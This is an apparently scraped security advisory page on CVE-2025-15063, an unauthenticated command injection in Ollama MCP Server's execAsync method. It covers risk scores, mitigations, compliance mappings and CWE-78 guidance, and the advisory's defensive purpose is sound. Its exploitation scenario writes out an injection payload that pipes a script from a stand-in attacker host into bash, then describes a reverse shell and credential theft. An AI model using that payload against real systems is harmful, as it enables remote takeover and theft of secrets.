CVE-2025-15063: Ollama: Command Injection enables RCE

UNKNOWN CISA: TRACK*

Published January 23, 2026

CISO Take

Unauthenticated remote code execution in Ollama MCP Server via OS command injection (CWE-78) — an attacker with network access needs zero credentials to own the host. Any AI agent infrastructure running Ollama with its MCP server exposed is at critical risk right now. Immediately restrict network access to Ollama MCP Server to localhost or trusted subnets, and apply the vendor patch as soon as it is available.

What is the risk?

Critical exploitability: no authentication required, network-reachable, trivial command injection technique (CWE-78). Ollama is widely deployed for self-hosted LLM inference in enterprise AI agent stacks and developer environments, increasing blast radius. The MCP (Model Context Protocol) integration layer is increasingly exposed in AI agent architectures, making this a high-probability target. Impact is full host compromise at service account privilege, enabling lateral movement, model exfiltration, and credential harvesting.

How severe is it?

CVSS 3.1

N/A

EPSS

2.1%

chance of exploitation in 30 days

Higher than 79% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

No known exploitation

Sophistication

Trivial

What should I do?

1 step

1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments. 2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs. 3) Apply least privilege to the Ollama service account — it should not have access to credentials stores, cloud IAM roles, or sensitive filesystems. 4) Apply vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and ZDI advisory for patch availability. 5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account. 6) If MCP server functionality is not actively required, disable it until patched.

What does CISA's SSVC say?

Decision Track*

Exploitation none

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Code Execution Auth Bypass Agent Plugin Inference AML.T0006 - Active Scanning AML.T0040 - AI Model Inference API Access AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0053 - AI Agent Tool Invocation AML.T0072 - Reverse Shell

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system Article 9(2) - Risk management system for high-risk AI systems

ISO 42001

A.6.1 - AI risk management A.8.4 - Security of AI systems A.9.2 - Operational security for AI systems

NIST AI RMF

MANAGE 2.2 - Mechanisms to sustain value and manage AI risks

OWASP LLM Top 10

LLM03:2025 - Supply Chain LLM06:2025 - Excessive Agency LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-15063?

Is CVE-2025-15063 actively exploited?

No confirmed active exploitation of CVE-2025-15063 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-15063?

1) IMMEDIATE: Identify all Ollama MCP Server instances in your environment — check for processes listening on default ports and any Docker/container deployments. 2) Restrict network access: bind Ollama MCP Server to 127.0.0.1 or enforce firewall rules to allow only trusted source IPs. 3) Apply least privilege to the Ollama service account — it should not have access to credentials stores, cloud IAM roles, or sensitive filesystems. 4) Apply vendor patch (ZDI-26-020) immediately upon release; monitor the Ollama GitHub repo and ZDI advisory for patch availability. 5) Detection: monitor for anomalous child processes spawned by the Ollama process (especially shells, curl, wget, base64), and alert on outbound connections from the Ollama service account. 6) If MCP server functionality is not actively required, disable it until patched.

What systems are affected by CVE-2025-15063?

This vulnerability affects the following AI/ML architecture patterns: model serving, agent frameworks, LLM inference infrastructure, MCP plugin ecosystems.

What is the CVSS score for CVE-2025-15063?

No CVSS score has been assigned yet.

What is the AI security impact?

Affected AI Architectures

model servingagent frameworksLLM inference infrastructureMCP plugin ecosystems

MITRE ATLAS Techniques

AML.T0006 Active Scanning

AML.T0040 AI Model Inference API Access

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0053 AI Agent Tool Invocation

AML.T0072 Reverse Shell

Compliance Controls Affected

EU AI Act: Article 15, Article 9, Article 9(2)

ISO 42001: A.6.1, A.8.4, A.9.2

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM03:2025, LLM06:2025, LLM07

What are the technical details?

Original Advisory

Ollama MCP Server execAsync Command Injection Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Ollama MCP Server. Authentication is not required to exploit this vulnerability. The specific flaw exists within the implementation of the execAsync method. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker can leverage this vulnerability to execute code in the context of the service account. Was ZDI-CAN-27683.

Exploitation Scenario

An adversary scans internet-facing IP ranges for exposed Ollama MCP Server endpoints (common in dev/lab environments left accessible). They craft a malicious tool invocation request targeting the vulnerable execAsync method, injecting a payload such as '; curl https://attacker.com/implant.sh | bash' into the user-controlled string parameter. Because no authentication is enforced, the payload executes immediately as the Ollama service account. The attacker establishes a reverse shell, then enumerates environment variables for LLM API keys (OpenAI, Anthropic), cloud credentials, and RAG database connection strings — subsequently exfiltrating model artifacts and pivoting to connected AI infrastructure.

Weaknesses (CWE)

CWE-78 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection') Primary

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

[Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
[Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.